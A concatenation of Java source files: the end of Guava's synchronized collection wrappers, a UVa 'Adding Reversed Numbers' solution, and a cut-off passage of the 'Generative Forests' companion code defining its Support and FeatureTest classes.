synchronized (mutex) {
return map(
Maps.transformValues(
delegate().columnMap(),
new com.google.common.base.Function<Map<R, V>, Map<R, V>>() {
@Override
public Map<R, V> apply(Map<R, V> t) {
return map(t, mutex);
}
}),
mutex);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
@Override
public boolean equals(@CheckForNull Object obj) {
if (this == obj) {
return true;
}
synchronized (mutex) {
return delegate().equals(obj);
}
}
}
}
| google/guava | android/guava/src/com/google/common/collect/Synchronized.java |
1,173 | /**
* The Antique Comedians of Malidinesia prefer comedies to tragedies. Unfortunately, most of the ancient
* plays are tragedies. Therefore the dramatic advisor of ACM has decided to transfigure some tragedies
* into comedies. Obviously, this work is very hard because the basic sense of the play must be kept intact,
* although all the things change to their opposites. For example the numbers: if any number appears in
* the tragedy, it must be converted to its reversed form before being accepted into the comedy play.
* Reversed number is a number written in arabic numerals but the order of digits is reversed. The
* first digit becomes last and vice versa. For example, if the main hero had 1245 strawberries in the
* tragedy, he has 5421 of them now. Note that all the leading zeros are omitted. That means if the
* number ends with a zero, the zero is lost by reversing (e.g. 1200 gives 21). Also note that the reversed
* number never has any trailing zeros.
* ACM needs to calculate with reversed numbers. Your task is to add two reversed numbers and
* output their reversed sum. Of course, the result is not unique because any particular number is a
* reversed form of several numbers (e.g. 21 could be 12, 120 or 1200 before reversing). Thus we must
* assume that no zeros were lost by reversing (e.g. assume that the original number was 12).
* Input
* The input consists of N cases. The first line of the input contains only positive integer N. Then follow
* the cases. Each case consists of exactly one line with two positive integers separated by space. These
* are the reversed numbers you are to add. Numbers will be at most 200 characters long.
* Output
* For each case, print exactly one line containing only one integer — the reversed sum of two reversed
* numbers. Omit any leading zeros in the output.
* Sample Input
* 3
* 24 1
* 4358 754
* 305 794
* Sample Output
* 34
* 1998
* 1
*/
//https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=654
import java.math.BigInteger;
import java.util.Scanner;
public class AddingReversedNumbers {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
int numberOfTestCases = input.nextInt();
while (numberOfTestCases != 0) {
BigInteger first = input.nextBigInteger();
BigInteger second = input.nextBigInteger();
StringBuilder firstString = new StringBuilder(first + "");
StringBuilder secondString = new StringBuilder(second + "");
BigInteger firstReversed = new BigInteger(firstString.reverse()
.toString());
BigInteger secondReversed = new BigInteger(secondString.reverse()
.toString());
BigInteger result = firstReversed.add(secondReversed);
String resultReversed = new StringBuilder(result + "").reverse()
.toString();
System.out.println(resultReversed.replaceFirst("^0*", ""));
numberOfTestCases--;
}
}
}
| kdn251/interviews | uva/AddingReversedNumbers.java |
1,175 | // Companion Code to the paper "Generative Forests" by R. Nock and M. Guillame-Bert.
import java.io.*;
import java.util.*;
/**************************************************************************************************************************************
* Class Support
* support related stuff
*****/
class Support implements Debuggable{
private Vector <Feature> features;
double volume = -1.0;
double weight_uniform_distribution = -1.0;
Support(){
features = null;
}
Support(Vector <Feature> vf, Dataset ds){
features = new Vector <>();
int i;
double wud = 1.0, v = 1.0;
for (i=0;i<vf.size();i++){
if (vf.elementAt(i) != null){
features.addElement(Feature.copyOf(vf.elementAt(i)));
v *= features.elementAt(i).length();
wud *= features.elementAt(i).length() / ds.features.elementAt(i).length();
}else
features.addElement(null); // option for Missing Data Imputation
}
volume = v;
weight_uniform_distribution = wud;
}
public String toString(){
int i;
String ret = "";
for (i = 0; i<features.size();i++){
if (features.elementAt(i) == null)
ret += "[ null ]"; // option for Missing Data Imputation
else
ret += features.elementAt(i).toShortString();
if (i<features.size() - 1)
ret += " X ";
}
ret += "{{" + volume + "}}{" + weight_uniform_distribution + "}";
return ret;
}
public static Support[] SPLIT_SUPPORT(Dataset ds, Support s, FeatureTest ft, int feature_split_index){
if ( (s.volume == -1.0) || (s.weight_uniform_distribution == -1.0) )
Dataset.perror("Support.class :: SPLIT_SUPPORT cannot split, negative weights");
Feature feature_in_measured_support = s.feature(feature_split_index);
Support[] ret = new Support[2];
FeatureTest f = FeatureTest.copyOf(ft, feature_in_measured_support);
Feature [] split_feat;
String tvb = f.check_trivial_branching(ds, feature_in_measured_support, true);
if (tvb.equals(FeatureTest.TRIVIAL_BRANCHING_LEFT)){
ret[0] = Support.copyOf(s);
ret[1] = null; //right
}else if (tvb.equals(FeatureTest.TRIVIAL_BRANCHING_RIGHT)){
ret[0] = null; //left
ret[1] = Support.copyOf(s);
}else{
ret[0] = Support.copyOf(s);
ret[1] = Support.copyOf(s);
split_feat = f.split_feature(ds, feature_in_measured_support, false, false);
ret[0].setFeatureAt(split_feat[0], feature_split_index);
ret[1].setFeatureAt(split_feat[1], feature_split_index);
}
return ret;
}
public Support[] split_support(int feature_index, Feature [] new_features){
// split support at a leaf, ensuring consistency
if ( (volume == -1.0) || (weight_uniform_distribution == -1.0) )
Dataset.perror("Support.class :: split_support cannot split, negative weights");
Feature.TEST_UNION(features.elementAt(feature_index), new_features[0], new_features[1]);
Support [] ret = new Support[2];
ret[0] = Support.copyOf(this);
ret[1] = Support.copyOf(this);
ret[0].setFeatureAt(new_features[0], feature_index);
ret[1].setFeatureAt(new_features[1], feature_index);
return ret;
}
public static Support copyOf(Support vc){
if ( (vc.volume == -1.0) || (vc.weight_uniform_distribution == -1.0) )
Dataset.perror("Support.class :: copyOf cannot copy, negative weights");
Support ret = new Support();
ret.features = new Vector <>();
int i;
for (i=0;i<vc.features.size();i++)
if (vc.features.elementAt(i) != null){
ret.features.addElement(Feature.copyOf(vc.features.elementAt(i)));
}else
ret.features.addElement(null);
ret.volume = vc.volume;
ret.weight_uniform_distribution = vc.weight_uniform_distribution;
return ret;
}
public static Support CAP(Vector <Node> nodes, boolean ensure_non_zero_measure, Dataset ds){
// cheaper option to compute the intersection of supports
// proceeds by feature; if one \cap returns null, returns null
Feature [] f_cur;
Vector <Feature> ret = new Vector <>();
Feature f;
int i, j;
for (i=0;i<nodes.elementAt(0).node_support.dim();i++){
f_cur = new Feature[nodes.size()];
for (j=0;j<nodes.size();j++){
if (nodes.elementAt(j).node_support.dim() != ds.features.size())
Dataset.perror("Support.class :: cannot compute CAP");
f_cur[j] = nodes.elementAt(j).node_support.feature(i);
}
f = Feature.CAP(f_cur, ensure_non_zero_measure);
if (f == null)
return null;
else
ret.addElement(f);
}
return new Support(ret, ds);
}
public Support cap(Support t, boolean ensure_non_zero_measure){
// return the intersection feature: EXPENSIVE REPLACE BY CAP
Support ret = new Support();
ret.volume = volume;
ret.weight_uniform_distribution = weight_uniform_distribution;
ret.features = new Vector <>();
int i;
Feature df;
double rat;
for (i=0;i<dim();i++){
df = features.elementAt(i).cap(t.feature(i), ensure_non_zero_measure);
if (df == null)
return null;
ret.features.addElement(df);
if (features.elementAt(i).length() == 0.0)
Dataset.perror("Support.class :: cannot cap support, /0");
rat = df.length() / features.elementAt(i).length();
ret.volume *= rat;
ret.weight_uniform_distribution *= rat;
}
return ret;
}
public static boolean SUPPORT_INTERSECTION_IS_EMPTY(Vector <Node> nodes, boolean ensure_non_zero_measure, Dataset ds){
Support ret = Support.CAP(nodes, ensure_non_zero_measure, ds);
if (ret == null)
return true;
return false;
}
public Feature feature(int i){
return features.elementAt(i);
}
public void setFeatureAt(Feature f, int i){
double rat;
if (features.elementAt(i) == null)
Dataset.perror("Support.class :: trouble in missing data imputation");
if (features.elementAt(i).length() == 0.0)
Dataset.perror("Feature.class :: cannot uppdate vol / wud: /0");
rat = f.length() / features.elementAt(i).length();
volume *= rat;
weight_uniform_distribution *= rat;
features.setElementAt(f, i);
}
public void setNullFeatureAt(int i, Dataset ds){
double rat;
if (features.elementAt(i).length() == 0.0)
Dataset.perror("Feature.class :: cannot uppdate vol / wud: /0");
rat = ds.features.elementAt(i).length() / features.elementAt(i).length();
volume /= features.elementAt(i).length();
weight_uniform_distribution *= rat;
features.setElementAt(null, i);
}
public int dim(){
return features.size();
}
public boolean is_subset_of(Support t){
//returns true iff this \subseteq t
if (dim() != t.dim())
Dataset.perror("Feature.class :: supports not comparable");
int i;
for (i=0;i<features.size();i++)
if (!Feature.IS_SUBFEATURE(features.elementAt(i), t.feature(i)))
return false;
return true;
}
public boolean observation_known_values_in_support(Observation e){
// return true iff all SPECIFIED attributes in e are in the corresponding support feature's domain
// ignores unspecified attributes
int i;
for (i=0;i<dim();i++){
if ( (!e.typed_features.elementAt(i).type.equals(Feature.UNKNOWN_VALUE)) && (!Feature.OBSERVATION_MATCHES_FEATURE(e, features.elementAt(i), i)) )
return false;
}
return true;
}
}
/**************************************************************************************************************************************
* Class FeatureTest
* provides encapsulation for sets relevant to feature tests
* a FeatureTest is used to compute the branching probabilities IF an observation's this.name is unknown
*****/
class FeatureTest implements Debuggable{
// private to prevent direct access
public static String TRIVIAL_BRANCHING_LEFT = "TRIVIAL_BRANCHING_LEFT",
TRIVIAL_BRANCHING_RIGHT = "TRIVIAL_BRANCHING_RIGHT",
NO_TRIVIAL_BRANCHING = "NO_TRIVIAL_BRANCHING";
//private Feature myFeature;
// removed and replaced by the name of the feature
public String name;
private double double_test;
private int int_test;
private BoolArray boolarray_to_string_test;
// do not store Strings but booleans:
// MUST HAVE LENGTH = the domain of the feature in Dataset
String type;
public static boolean HAS_AT_LEAST_ONE_FEATURE_TEST(Feature f, Dataset ds){
if (!IS_SPLITTABLE(f))
return false;
if ( (Feature.IS_CONTINUOUS(f.type)) && (f.dmax - f.dmin <= 0.0) )
return false;
if ( (Feature.IS_INTEGER(f.type)) && (f.imax - f.imin <= 0) )
return false;
if ( (Feature.IS_NOMINAL(f.type)) && (f.modalities.size() <= 1) )
return false;
return true;
}
public static Vector<FeatureTest> ALL_FEATURE_TESTS(Feature f, Dataset ds){
// if continuous, list of evenly spaced ties
// if nominal, list of partial non-empty subsets of the whole set
// if integer, list of integers
if (!IS_SPLITTABLE(f))
return null;
Vector <FeatureTest> v = new Vector<FeatureTest> ();
int i, j;
if (Feature.IS_CONTINUOUS(f.type)){
if (f.dmax - f.dmin <= 0.0){
v = null;
}else{
double vmin = f.dmin;
double vmax = f.dmax;
double delta = (vmax - vmin) / ( (double) (Feature.NUMBER_CONTINUOUS_TIES + 1) );
double vcur = vmin + delta;
for (i=0;i<Feature.NUMBER_CONTINUOUS_TIES;i++){
v.add(new FeatureTest(vcur, f));
vcur += delta;
}
}
}else if (Feature.IS_INTEGER(f.type)){
if (f.imax - f.imin <= 0){
v = null;
}else{
int vmin = f.imin;
int nvals = f.imax - f.imin;
for (i=0;i<nvals;i++){
v.add(new FeatureTest(vmin + i, f));
}
}
}else if (Feature.IS_NOMINAL(f.type)){
Vector <BoolArray> all_boolarrays_not_rescaled;
BoolArray dumba, baind;
Feature reference_in_ds = ds.features.elementAt(ds.indexOfFeature(f.name));
all_boolarrays_not_rescaled = Utils.ALL_NON_TRIVIAL_BOOLARRAYS(f.modalities.size(), Utils.GUESS_MAX_TRUE_IN_BOOLARRAY(f.modalities.size()));
//making sure the BoolArrays tests are re-indexed on DS feature modalities
if (all_boolarrays_not_rescaled.size() > 0){
for (i=0;i<all_boolarrays_not_rescaled.size();i++){
dumba = new BoolArray(reference_in_ds.modalities.size());
baind = all_boolarrays_not_rescaled.elementAt(i);
for (j=0;j<baind.size();j++)
if (baind.get(j))
dumba.set(reference_in_ds.modalities.indexOf(f.modalities.elementAt(j)), true);
v.add(new FeatureTest(dumba, f));
}
}else
v = null;
}
return v;
}
public static String DISPLAY_TESTS(Vector<FeatureTest> ft, boolean show_all){
int max_display = 5;
if (show_all)
max_display = ft.size();
int i, j;
String v = "{";
Vector <String> dv;
if (ft != null){
if (ft.size() == 0)
Dataset.perror("Feature.class :: avoid empty but non null test sets");
for (i =0;i<ft.size();i++){
if (i < max_display){
v += ft.elementAt(i);
if (i<ft.size()-1)
v += ", ";
}else{
v += "... ";
break;
}
}
}
v += "}";
return v;
}
public static boolean IS_SPLITTABLE(Feature f){
if (Feature.IS_NOMINAL(f.type)){
if (f.modalities == null)
return false;
if (f.modalities.size() <= 1)
return false;
}else if (Feature.IS_CONTINUOUS(f.type)){
if (f.dmin >= f.dmax)
return false;
}else if (Feature.IS_INTEGER(f.type)){
if (f.imin >= f.imax - 1)
return false;
}
return true;
}
FeatureTest(Feature f){
double_test = Feature.FORBIDDEN_VALUE;
int_test = Feature.FORBIDDEN_VALUE;
boolarray_to_string_test = null;
name = f.name;
}
FeatureTest(double d, Feature f){
this(f);
double_test = d;
type = Feature.CONTINUOUS;
}
FeatureTest(int i, Feature f){
this(f);
int_test = i;
type = Feature.INTEGER;
}
FeatureTest(BoolArray b, Feature f){
this(f);
boolarray_to_string_test = b.duplicate();
type = Feature.NOMINAL;
}
public String check_trivial_branching(Dataset ds, Feature f, boolean prevent_zero_measure){
// checks whether the split induces a trivial branching on f
// if prevent_zero_measure AND f is continuous, adds double_test == f.dmin for TRIVIAL_BRANCHING_RIGHT (prevents zero measure after eventual split)
if ( (!f.type.equals(type)) || (!f.name.equals(name)) )
Dataset.perror("FeatureTest.class :: checking trivial branching on wrong type / name");
String ret = null;
if (Feature.IS_CONTINUOUS(type)){
if ( (double_test < f.dmin) || ( (prevent_zero_measure) && (double_test <= f.dmin) ) )
ret = TRIVIAL_BRANCHING_RIGHT;
else if (double_test >= f.dmax)
ret = TRIVIAL_BRANCHING_LEFT;
else
ret = NO_TRIVIAL_BRANCHING;
}else if (Feature.IS_INTEGER(type)){
if (int_test < f.imin)
ret = TRIVIAL_BRANCHING_RIGHT;
else if (int_test >= f.imax)
ret = TRIVIAL_BRANCHING_LEFT;
else
ret = NO_TRIVIAL_BRANCHING;
}else if (Feature.IS_NOMINAL(type)){
Vector <String> moda = getStringTest(ds); // get all String corresponding to the test
if (moda == null)
Dataset.perror("Feature.class :: no test for nominal feature " + name);
boolean all_my_moda_outside_f = true, all_f_moda_in_mine = true;
int i;
for (i=0;i<moda.size();i++)
if (f.modalities.contains(moda.elementAt(i)))
all_my_moda_outside_f = false;
for (i=0;i<f.modalities.size();i++)
if (!moda.contains(f.modalities.elementAt(i)))
all_f_moda_in_mine = false;
if ( (all_my_moda_outside_f) && (all_f_moda_in_mine) )
Dataset.perror("Feature.class :: inconsistency in check_trivial_branching");
if (all_my_moda_outside_f)
ret = TRIVIAL_BRANCHING_RIGHT;
else if (all_f_moda_in_mine)
ret = TRIVIAL_BRANCHING_LEFT;
else
ret = NO_TRIVIAL_BRANCHING;
}
return ret;
}
public double [] rapid_stats_split_measure_hard(LocalEmpiricalMeasure parent_measure, Dataset ds, Feature f_split, boolean unspecified_attribute_handling_biased){
// simplified version of split_measure_hard: just returns statistics
double [] ret = new double[2];
int i, index_feature_in_e = ds.indexOfFeature(name);
for (i=0;i<parent_measure.observations_indexes.length;i++){
if ((!Observation.FEATURE_IS_UNKNOWN(
ds.observations_from_file.elementAt(parent_measure.observations_indexes[i]),
index_feature_in_e))
&& (!type.equals(
ds.observations_from_file
.elementAt(parent_measure.observations_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type)))
Dataset.perror(
"FeatureTest.class :: type mismatch to split examples ( "
+ type
+ " != "
+ ds.observations_from_file
.elementAt(parent_measure.observations_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type
+ ")");
if (observation_goes_left(ds.observations_from_file.elementAt(parent_measure.observations_indexes[i]), ds, f_split, unspecified_attribute_handling_biased))
ret[0] += 1.0;
else
ret[1] += 1.0;
}
return ret;
}
public LocalEmpiricalMeasure [] split_measure_hard(LocalEmpiricalMeasure parent_measure, Dataset ds, Feature f_split, boolean unspecified_attribute_handling_biased){
// hard split of the measure according to the feature
if (parent_measure.observations_indexes == null)
return null;
int index_feature_in_e = ds.indexOfFeature(name);
Vector <Integer> left_indexes = new Vector<>();
Vector <Integer> right_indexes = new Vector<>();
LocalEmpiricalMeasure [] ret;
int i;
for (i=0;i<parent_measure.observations_indexes.length;i++){
if ((!Observation.FEATURE_IS_UNKNOWN(
ds.observations_from_file.elementAt(parent_measure.observations_indexes[i]),
index_feature_in_e))
&& (!type.equals(
ds.observations_from_file
.elementAt(parent_measure.observations_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type)))
Dataset.perror(
"FeatureTest.class :: type mismatch to split examples ( "
+ type
+ " != "
+ ds.observations_from_file
.elementAt(parent_measure.observations_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type
+ ")");
if (observation_goes_left(ds.observations_from_file.elementAt(parent_measure.observations_indexes[i]), ds, f_split, unspecified_attribute_handling_biased))
left_indexes.addElement(new Integer(parent_measure.observations_indexes[i]));
else
right_indexes.addElement(new Integer(parent_measure.observations_indexes[i]));
}
ret = new LocalEmpiricalMeasure[2];
ret[0] = new LocalEmpiricalMeasure(left_indexes.size());
ret[1] = new LocalEmpiricalMeasure(right_indexes.size());
int [] tab_left, tab_right;
tab_left = new int[left_indexes.size()];
tab_right = new int[right_indexes.size()];
for (i=0;i<left_indexes.size();i++)
tab_left[i] = left_indexes.elementAt(i).intValue();
for (i=0;i<right_indexes.size();i++)
tab_right[i] = right_indexes.elementAt(i).intValue();
// check size sum
if (tab_left.length + tab_right.length != parent_measure.observations_indexes.length)
Dataset.perror(
"FeatureTest.class :: size mismatch to split examples ( "
+ tab_left.length
+ " + "
+ tab_right.length
+ " != "
+ parent_measure.observations_indexes.length
+ ")");
ret[0].init_indexes(tab_left);
ret[1].init_indexes(tab_right);
return ret;
}
public LocalEmpiricalMeasure [] split_measure_soft(LocalEmpiricalMeasure parent_measure, Dataset ds, Feature f_split){
// soft split of the measure according to the feature
if (parent_measure.observations_indexes == null)
return null;
int index_feature_in_e = ds.indexOfFeature(name);
LocalEmpiricalMeasure [] ret = new LocalEmpiricalMeasure[2];
ret[0] = new LocalEmpiricalMeasure(0);
ret[1] = new LocalEmpiricalMeasure(0);
double [] p_loc, p_new;
Observation oo;
int i;
for (i=0;i<parent_measure.observations_indexes.length;i++){
p_new = new double [2];
oo = ds.observations_from_file.elementAt(parent_measure.observations_indexes[i]);
if ((!Observation.FEATURE_IS_UNKNOWN(oo, index_feature_in_e))
&& (!type.equals(oo.typed_features.elementAt(index_feature_in_e).type)))
Dataset.perror(
"FeatureTest.class :: type mismatch to split examples ( "
+ type
+ " != "
+ oo.typed_features.elementAt(index_feature_in_e).type
+ ")");
p_loc = share_observation_goes_left(oo, ds, f_split);
p_new[0] = p_loc[0] * parent_measure.proportions[i];
p_new[1] = p_loc[1] * parent_measure.proportions[i];
if (p_new[0] + p_new[1] == 0.0)
Dataset.perror("Feature.class :: observation count split in zero probabilities");
if (p_new[0] > 0.0)
ret[0].add(parent_measure.observations_indexes[i], p_new[0]);
if (p_new[1] > 0.0)
ret[1].add(parent_measure.observations_indexes[i], p_new[1]);
}
if ( (!ret[0].contains_indexes()) && (!ret[1].contains_indexes()) )
Dataset.perror("Feature.class :: no indexes kept from " + parent_measure);
if (!ret[0].contains_indexes())
ret[0] = null;
if (!ret[1].contains_indexes())
ret[1] = null;
return ret;
}
public int [][] split_observations(int [] observation_indexes, Dataset ds, Feature f_split, boolean unspecified_attribute_handling_biased){
// returns an array with two arrays: ret[0] = left observations; ret[1] = right observations
// they must match with indexes in dataset
if (observation_indexes == null)
return null;
int index_feature_in_e = ds.indexOfFeature(name);
Vector <Integer> left_indexes = new Vector<>();
Vector <Integer> right_indexes = new Vector<>();
int [][] ret = new int [2][];
int i;
for (i=0;i<observation_indexes.length;i++){
if ((!Observation.FEATURE_IS_UNKNOWN(
ds.observations_from_file.elementAt(observation_indexes[i]), index_feature_in_e))
&& (!type.equals(
ds.observations_from_file
.elementAt(observation_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type)))
Dataset.perror(
"FeatureTest.class :: type mismatch to split examples ( "
+ type
+ " != "
+ ds.observations_from_file
.elementAt(observation_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type
+ ")");
if (observation_goes_left(ds.observations_from_file.elementAt(observation_indexes[i]), ds, f_split, unspecified_attribute_handling_biased))
left_indexes.addElement(new Integer(observation_indexes[i]));
else
right_indexes.addElement(new Integer(observation_indexes[i]));
}
ret[0] = new int[left_indexes.size()];
ret[1] = new int[right_indexes.size()];
for (i=0;i<left_indexes.size();i++)
ret[0][i] = left_indexes.elementAt(i).intValue();
for (i=0;i<right_indexes.size();i++)
ret[1][i] = right_indexes.elementAt(i).intValue();
// check size sum
if (ret[0].length + ret[1].length != observation_indexes.length)
Dataset.perror(
"FeatureTest.class :: size mismatch to split examples ( "
+ ret[0].length
+ " + "
+ ret[1].length
+ " != "
+ observation_indexes.length
+ ")");
return ret;
}
public Feature [] split_feature(Dataset ds, Feature f, boolean check_non_zero_measure, boolean check_consistency){
// returns TWO features by applying this to f, [left, right]
// thus, USES THE DOMAIN OF f, NOT that in ds
Feature [] ft = new Feature[2];
Feature left = null, right = null;
Vector <String> vright;
Vector <String> moda, modaleft, modaright;
int i;
if (check_consistency)
checkConsistency(ds, f, check_non_zero_measure); // after that, split can guarantee non-zero support measure on both features, ASSUMING f is in a Tree (not from a Dataset)
if (Feature.IS_CONTINUOUS(f.type)){
left = new Feature(f.name, f.type, f.modalities, f.dmin, double_test, check_non_zero_measure);
right = new Feature(f.name, f.type, f.modalities, double_test, f.dmax, check_non_zero_measure);
}else if (Feature.IS_INTEGER(f.type)){
left = new Feature(f.name, f.type, f.modalities, f.imin, int_test);
right = new Feature(f.name, f.type, f.modalities, int_test + 1, f.imax); // CHECK: was true
}else if (Feature.IS_NOMINAL(f.type)){
moda = getStringTest(ds); // get all String corresponding to the test
if (moda == null)
Dataset.perror("Feature.class :: no test for nominal feature " + f);
// compute modaleft
modaleft = new Vector <>();
modaright = new Vector <>();
for (i=0;i<f.modalities.size();i++)
if (moda.contains(f.modalities.elementAt(i)))
modaleft.addElement(new String(f.modalities.elementAt(i)));
else
modaright.addElement(new String(f.modalities.elementAt(i)));
if (modaleft.size() == 0)
Dataset.perror("Feature.class :: no modality to add to the left split");
if (modaright.size() == 0)
Dataset.perror("Feature.class :: no modality to add to the right split");
left = new Feature(f.name, f.type, modaleft, f.dmin, f.dmax);
right = new Feature(f.name, f.type, modaright, f.dmin, f.dmax);
}
ft[0] = left;
ft[1] = right;
return ft;
}
public double [] share_observation_goes_left(Observation e, Dataset ds, Feature f_node){
// path followed in the tree by an observation
// continuous OR integer values : <= is left, > is right
// nominal values : in the set is left, otherwise is right
// f_node = feature split by this, IN A TREE
// returns an array[2], [0] = p_left; [1] = p_right
// both values sum to 1.0 and can be non = 0 when unknonwn value
int index_feature_in_e = ds.indexOfFeature(name);
checkConsistency(ds, f_node, false);
double cv;
int ci;
String nv;
Vector <String> ssv;
int i;
double p_left;
double [] ret = new double[2];
boolean found = false;
p_left = -1.0;
if (Observation.FEATURE_IS_UNKNOWN(e, index_feature_in_e)){
if (Feature.IS_CONTINUOUS(type)){
if (f_node.dmax == f_node.dmin)
Dataset.perror("Feature.class :: f_node.dmax = " + f_node.dmax + " == f_node.dmin ");
p_left = ( double_test - f_node.dmin ) / (f_node.dmax - f_node.dmin);
}else if (Feature.IS_INTEGER(type)){
if (f_node.imax == f_node.imin)
Dataset.perror("Feature.class :: f_node.imax = " + f_node.imax + " == f_node.imin ");
p_left = ( (double) int_test - f_node.imin + 1 ) / ((double) f_node.imax - f_node.imin + 1);
}else if (Feature.IS_NOMINAL(type))
p_left = ((double) boolarray_to_string_test.cardinality())/((double) f_node.modalities.size());
else
Dataset.perror("Feature.class :: no type available for feature " + this);
}else if (Feature.IS_CONTINUOUS(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.NOMINAL))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.INTEGER)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a Double");
cv = e.typed_features.elementAt(index_feature_in_e).dv;
if (cv <= double_test)
p_left = 1.0;
else
p_left = 0.0;
}else if (Feature.IS_INTEGER(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.NOMINAL))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.CONTINUOUS)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a Double");
ci = e.typed_features.elementAt(index_feature_in_e).iv;
if (ci <= int_test)
p_left = 1.0;
else
p_left = 0.0;
}else if (Feature.IS_NOMINAL(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.CONTINUOUS))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.INTEGER)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a String");
nv = e.typed_features.elementAt(index_feature_in_e).sv;
ssv = getStringTest(ds);
found = false;
i = 0;
do{
if (nv.equals((String) ssv.elementAt(i)))
found = true;
else
i++;
}while( (!found) && (i<ssv.size()) );
if (found)
p_left = 1.0;
else
p_left = 0.0;
}else
Dataset.perror("Feature.class :: no type / value available for feature " + this);
if (p_left == -1.0)
Dataset.perror("Feature.class :: error in the computation of p_left ");
ret[0] = p_left;
ret[1] = 1.0 - p_left;
return ret;
}
public boolean observation_goes_left(Observation e, Dataset ds, Feature f_node, boolean unspecified_attribute_handling_biased){
// path followed in the tree by an observation
// continuous OR integer values : <= is left, > is right
// nominal values : in the set is left, otherwise is right
// f_node = feature split by this, IN A TREE
// unspecified_attribute_handling_biased = true => uses local domain and split to decide random branching, else Bernoulli(0.5)
int index_feature_in_e = ds.indexOfFeature(name);
checkConsistency(ds, f_node, false);
// important: for nominal attributes, ensures the strings corresponding to this are a subset of f_node.modalities
double cv;
int ci;
String nv;
Vector <String> ssv;
int i;
double p_left;
if (Observation.FEATURE_IS_UNKNOWN(e, index_feature_in_e)){
if (!unspecified_attribute_handling_biased){
if (Statistics.RANDOM_P_NOT_HALF() < 0.5)
return true;
else
return false;
}else{
p_left = -1.0;
if (Feature.IS_CONTINUOUS(type)){
if (f_node.dmax == f_node.dmin)
Dataset.perror("Feature.class :: f_node.dmax = " + f_node.dmax + " == f_node.dmin ");
p_left = ( double_test - f_node.dmin ) / (f_node.dmax - f_node.dmin);
}else if (Feature.IS_INTEGER(type)){
if (f_node.imax == f_node.imin)
Dataset.perror("Feature.class :: f_node.imax = " + f_node.imax + " == f_node.imin ");
p_left = ( (double) int_test - f_node.imin + 1 ) / ((double) f_node.imax - f_node.imin + 1);
}else if (Feature.IS_NOMINAL(type))
p_left = ((double) boolarray_to_string_test.cardinality())/((double) f_node.modalities.size());
else
Dataset.perror("Feature.class :: no type available for feature " + this);
if (Statistics.RANDOM_P_NOT(p_left) < p_left)
return true;
else
return false;
}
}
if (Feature.IS_CONTINUOUS(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.NOMINAL))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.INTEGER)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a Double");
cv = e.typed_features.elementAt(index_feature_in_e).dv;
if (cv <= double_test)
return true;
return false;
}else if (Feature.IS_INTEGER(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.NOMINAL))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.CONTINUOUS)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a Double");
ci = e.typed_features.elementAt(index_feature_in_e).iv;
if (ci <= int_test)
return true;
return false;
}else if (Feature.IS_NOMINAL(type)){
if ((e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.CONTINUOUS))
|| (e.typed_features.elementAt(index_feature_in_e).type.equals(Feature.INTEGER)))
Dataset.perror(
"Feature.class :: wrong class match : "
+ e.typed_features.elementAt(index_feature_in_e)
+ " not a String");
nv = e.typed_features.elementAt(index_feature_in_e).sv;
ssv = getStringTest(ds);
// tag_opt
for (i=0;i<ssv.size();i++){
if (nv.equals((String) ssv.elementAt(i)))
return true;
}
return false;
}else
Dataset.perror("Feature.class :: no type available for feature " + this);
return false;
}
public static FeatureTest copyOf(FeatureTest fv, Feature f){
if (!fv.name.equals(f.name))
Dataset.perror("FeatureTest.class :: no copy possible using features of different names");
FeatureTest fr = null;
if (fv.type.equals(Feature.CONTINUOUS))
fr = new FeatureTest(fv.getDoubleTest(), f);
else if (fv.type.equals(Feature.INTEGER))
fr = new FeatureTest(fv.getIntTest(), f);
else if (fv.type.equals(Feature.NOMINAL))
fr = new FeatureTest(fv.getBoolArrayToStringTest(), f);
else
Dataset.perror("FeatureTest.class :: no such type as " + fv.type);
return fr;
}
public boolean equals(Object o){
if (o == this)
return true;
if (!(o instanceof FeatureTest))
return false;
FeatureTest ft = (FeatureTest) o;
if (!ft.type.equals(type))
return false;
if ( (type.equals(Feature.NOMINAL)) && (!boolarray_to_string_test.equals(ft.getBoolArrayToStringTest())) )
return false;
else if ( (type.equals(Feature.INTEGER)) && (int_test != ft.getIntTest()) )
return false;
else if ( (type.equals(Feature.CONTINUOUS)) && (double_test != ft.getDoubleTest()) )
return false;
return true;
}
public void checkConsistency(Feature f){
if (!type.equals(f.type))
Dataset.perror(
"FeatureTest.class :: incompatible feature types (" + type + " vs " + f.type + ")");
if ( (type.equals(Feature.NOMINAL)) && (f.modalities == null) )
Dataset.perror("FeatureTest.class :: test computed on a feature w/o modalities");
}
public void checkConsistency(Dataset ds, Feature f, boolean check_non_zero_measure){
if (!type.equals(f.type))
Dataset.perror(
"FeatureTest.class :: incompatible feature types ("
+ type
+ " vs Feature "
+ f.type
+ ")");
if (!name.equals(f.name))
Dataset.perror(
"FeatureTest.class :: incompatible feature names ("
+ name
+ " vs Feature "
+ f.name
+ ")");
